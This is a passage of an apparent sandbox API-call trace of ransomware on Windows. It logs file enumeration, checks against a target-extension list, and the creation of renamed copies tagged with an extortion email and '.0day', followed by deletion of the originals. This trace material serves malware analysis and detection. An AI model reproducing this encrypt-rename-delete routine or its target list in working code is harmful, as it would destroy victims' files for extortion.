dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0274.988] GetLastError () returned 0x0 [0274.988] ReadFile (in: hFile=0x378, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x228, lpOverlapped=0x0) returned 1 [0275.018] WriteFile (in: hFile=0x2c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x230, lpOverlapped=0x0) returned 1 [0275.019] ReadFile (in: hFile=0x378, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0275.019] WriteFile (in: hFile=0x2c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0275.019] SetEndOfFile (hFile=0x2c4) returned 1 [0275.019] CloseHandle (hObject=0x2c4) returned 1 [0275.019] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0275.019] SetEndOfFile (hFile=0x378) returned 1 [0275.024] CloseHandle (hObject=0x378) returned 1 [0275.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0275.024] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf")) returned 1 [0275.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.025] lstrlenW (lpString=".doc") returned 4 [0275.025] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.025] lstrlenW (lpString=".docx") returned 5 [0275.025] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.025] lstrlenW (lpString=".pdf") returned 4 [0275.025] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.025] lstrlenW (lpString=".xls") returned 4 [0275.025] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.025] lstrlenW (lpString=".xlsx") returned 5 [0275.025] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.025] lstrlenW (lpString=".ppt") returned 4 [0275.025] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.025] lstrlenW (lpString=".zip") returned 4 [0275.025] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.025] lstrlenW (lpString=".rar") returned 4 [0275.025] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.025] lstrlenW (lpString=".bz2") returned 4 [0275.025] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.025] lstrlenW (lpString=".7z") returned 3 [0275.025] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.025] lstrlenW (lpString=".dbf") returned 4 [0275.025] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.025] lstrlenW (lpString=".1cd") returned 4 [0275.025] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.025] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.025] lstrlenW (lpString=".jpg") returned 4 [0275.025] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.026] lstrlenW (lpString=".doc") returned 4 [0275.026] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.026] lstrlenW (lpString=".docx") returned 5 [0275.026] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.026] lstrlenW (lpString=".pdf") returned 4 [0275.026] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.026] lstrlenW (lpString=".xls") returned 4 [0275.026] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.026] lstrlenW (lpString=".xlsx") returned 5 [0275.026] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.026] lstrlenW (lpString=".ppt") returned 4 [0275.026] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.026] lstrlenW (lpString=".zip") returned 4 [0275.026] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.026] lstrlenW (lpString=".rar") returned 4 [0275.026] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.026] lstrlenW (lpString=".bz2") returned 4 [0275.026] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.026] lstrlenW (lpString=".7z") returned 3 [0275.026] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.026] lstrlenW (lpString=".dbf") returned 4 [0275.026] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.026] lstrlenW (lpString=".1cd") returned 4 [0275.026] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63 [0275.026] lstrlenW (lpString=".jpg") returned 4 [0275.026] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.027] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0275.027] lstrlenW (lpString="DD01793_.WMF") returned 12 [0275.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0275.033] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=3252) returned 1 [0275.033] CloseHandle (hObject=0x39c) returned 1 [0275.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf")) returned 0x20 [0275.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0275.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0275.043] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0275.043] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0275.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0275.043] GetLastError () returned 0x0 [0275.043] ReadFile (in: hFile=0x39c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0xcb4, lpOverlapped=0x0) returned 1 [0275.053] WriteFile (in: hFile=0x378, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xcc0, lpOverlapped=0x0) returned 1 [0275.055] ReadFile (in: hFile=0x39c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0275.055] WriteFile (in: hFile=0x378, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0275.055] SetEndOfFile (hFile=0x378) returned 1 [0275.055] CloseHandle (hObject=0x378) returned 1 [0275.055] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0275.055] SetEndOfFile (hFile=0x39c) returned 1 [0275.057] CloseHandle (hObject=0x39c) returned 1 [0275.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0275.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf")) returned 1 [0275.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.057] lstrlenW (lpString=".doc") returned 4 [0275.057] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.057] lstrlenW (lpString=".docx") returned 5 [0275.057] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.058] lstrlenW (lpString=".pdf") returned 4 [0275.058] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.058] lstrlenW (lpString=".xls") returned 4 [0275.058] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.058] lstrlenW (lpString=".xlsx") returned 5 [0275.058] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.058] lstrlenW (lpString=".ppt") returned 4 [0275.058] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.058] lstrlenW (lpString=".zip") returned 4 [0275.058] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.058] lstrlenW (lpString=".rar") returned 4 [0275.058] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.058] lstrlenW (lpString=".bz2") returned 4 [0275.058] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.058] lstrlenW (lpString=".7z") returned 3 [0275.058] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.058] lstrlenW (lpString=".dbf") returned 4 [0275.058] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.058] lstrlenW (lpString=".1cd") returned 4 [0275.058] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.058] lstrlenW (lpString=".jpg") returned 4 [0275.058] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.059] lstrlenW (lpString=".doc") returned 4 [0275.059] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0275.059] lstrlenW (lpString=".docx") returned 5 [0275.059] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0275.059] lstrlenW (lpString=".pdf") returned 4 [0275.059] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0275.059] lstrlenW (lpString=".xls") returned 4 [0275.059] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0275.059] lstrlenW (lpString=".xlsx") returned 5 [0275.059] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0275.059] lstrlenW (lpString=".ppt") returned 4 [0275.059] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0275.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.059] lstrlenW (lpString=".zip") returned 4 [0275.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0275.059] lstrlenW (lpString=".rar") returned 4 [0275.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0275.059] lstrlenW (lpString=".bz2") returned 4 [0275.059] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0275.059] lstrlenW (lpString=".7z") returned 3 [0275.059] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0275.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.059] lstrlenW (lpString=".dbf") returned 4 [0275.059] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0275.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.059] lstrlenW (lpString=".1cd") returned 4 [0275.059] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0275.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0275.059] lstrlenW (lpString=".jpg") returned 4 [0275.059] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0275.059] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0275.060] lstrlenW (lpString="ED00019_.WMF") returned 12 [0275.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0275.060] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=13042) returned 1 [0275.060] CloseHandle (hObject=0x39c) returned 1 [0275.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf")) returned 0x20 [0275.060] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0275.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0275.060] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0275.060] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0275.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00019_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00019_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0275.061] GetLastError () returned 0x0 [0275.061] ReadFile (in: hFile=0x39c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x32f2, lpOverlapped=0x0) returned 1 [0275.075] WriteFile (hFile=0x378, lpBuffer=0x3810020, nNumberOfBytesToWrite=0x3300, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0) Thread: id = 62 os_tid = 0x698 [0265.327] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x34f0060 [0265.328] lstrlenW (lpString="C:") returned 2 [0265.328] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x30efd00 | out: lpFindFileData=0x30efd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x5878a0 [0265.331] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0265.331] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0265.331] lstrlenW (lpString="$Recycle.Bin") returned 12 [0265.331] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0265.331] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x3500068 [0265.332] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0265.332] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x30efa84 | out: lpFindFileData=0x30efa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x555ac8 [0265.332] FindNextFileW (in: hFindFile=0x555ac8, lpFindFileData=0x30efa84 | out: lpFindFileData=0x30efa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.332] FindNextFileW (in: hFindFile=0x555ac8, lpFindFileData=0x30efa84 | out: lpFindFileData=0x30efa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x75e61dc0, ftLastAccessTime.dwHighDateTime=0x1d5245c, ftLastWriteTime.dwLowDateTime=0x75e61dc0, ftLastWriteTime.dwHighDateTime=0x1d5245c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0265.332] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0265.332] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0265.332] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0265.332] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0265.332] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x3510070 [0265.333] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0265.337] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x30ef808 | out: lpFindFileData=0x30ef808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x75e61dc0, ftLastAccessTime.dwHighDateTime=0x1d5245c, ftLastWriteTime.dwLowDateTime=0x75e61dc0, ftLastWriteTime.dwHighDateTime=0x1d5245c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x555b08 [0265.337] FindNextFileW (in: hFindFile=0x555b08, lpFindFileData=0x30ef808 | out: lpFindFileData=0x30ef808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x75e61dc0, ftLastAccessTime.dwHighDateTime=0x1d5245c, ftLastWriteTime.dwLowDateTime=0x75e61dc0, ftLastWriteTime.dwHighDateTime=0x1d5245c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.337] FindNextFileW (in: hFindFile=0x555b08, lpFindFileData=0x30ef808 | out: lpFindFileData=0x30ef808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x75e61dc0, ftCreationTime.dwHighDateTime=0x1d5245c, ftLastAccessTime.dwLowDateTime=0x75e61dc0, ftLastAccessTime.dwHighDateTime=0x1d5245c, ftLastWriteTime.dwLowDateTime=0x75e61dc0, ftLastWriteTime.dwHighDateTime=0x1d5245c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0265.337] lstrlenW (lpString="desktop.ini") returned 11 [0265.337] lstrlenW (lpString=".1cd") returned 4 [0265.337] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0265.337] lstrlenW (lpString=".3ds") returned 4 [0265.337] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0265.337] lstrlenW (lpString=".3fr") returned 4 [0265.337] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0265.337] lstrlenW (lpString=".3g2") returned 4 [0265.337] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0265.337] lstrlenW (lpString=".3gp") returned 4 [0265.337] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0265.337] lstrlenW (lpString=".7z") returned 3 [0265.338] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0265.338] lstrlenW (lpString=".accda") returned 6 [0265.338] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0265.338] lstrlenW (lpString=".accdb") returned 6 [0265.338] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0265.338] lstrlenW (lpString=".accdc") returned 6 [0265.338] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0265.338] lstrlenW (lpString=".accde") returned 6 [0265.338] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0265.338] lstrlenW (lpString=".accdt") returned 6 [0265.338] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0265.338] lstrlenW (lpString=".accdw") returned 6 [0265.338] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0265.338] lstrlenW (lpString=".adb") returned 4 [0265.338] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0265.338] lstrlenW (lpString=".adp") returned 4 [0265.338] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0265.338] lstrlenW (lpString=".ai") returned 3 [0265.338] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0265.338] lstrlenW (lpString=".ai3") returned 4 [0265.338] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0265.338] lstrlenW (lpString=".ai4") returned 4 [0265.338] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0265.338] lstrlenW (lpString=".ai5") returned 4 [0265.338] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0265.338] lstrlenW (lpString=".ai6") returned 4 [0265.338] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0265.338] lstrlenW (lpString=".ai7") returned 4 [0265.338] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0265.338] lstrlenW (lpString=".ai8") returned 4 [0265.338] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0265.338] lstrlenW (lpString=".anim") returned 5 [0265.338] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0265.338] lstrlenW (lpString=".arw") returned 4 [0265.338] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0265.338] lstrlenW (lpString=".as") returned 3 [0265.339] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0265.339] lstrlenW (lpString=".asa") returned 4 [0265.339] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".asc") returned 4 [0265.339] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".ascx") returned 5 [0265.339] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0265.339] lstrlenW (lpString=".asm") returned 4 [0265.339] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0265.339] lstrlenW (lpString=".asmx") returned 5 [0265.339] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0265.339] lstrlenW (lpString=".asp") returned 4 [0265.339] lstrcmpiW (lpString1=".asp", lpString2=".ini") 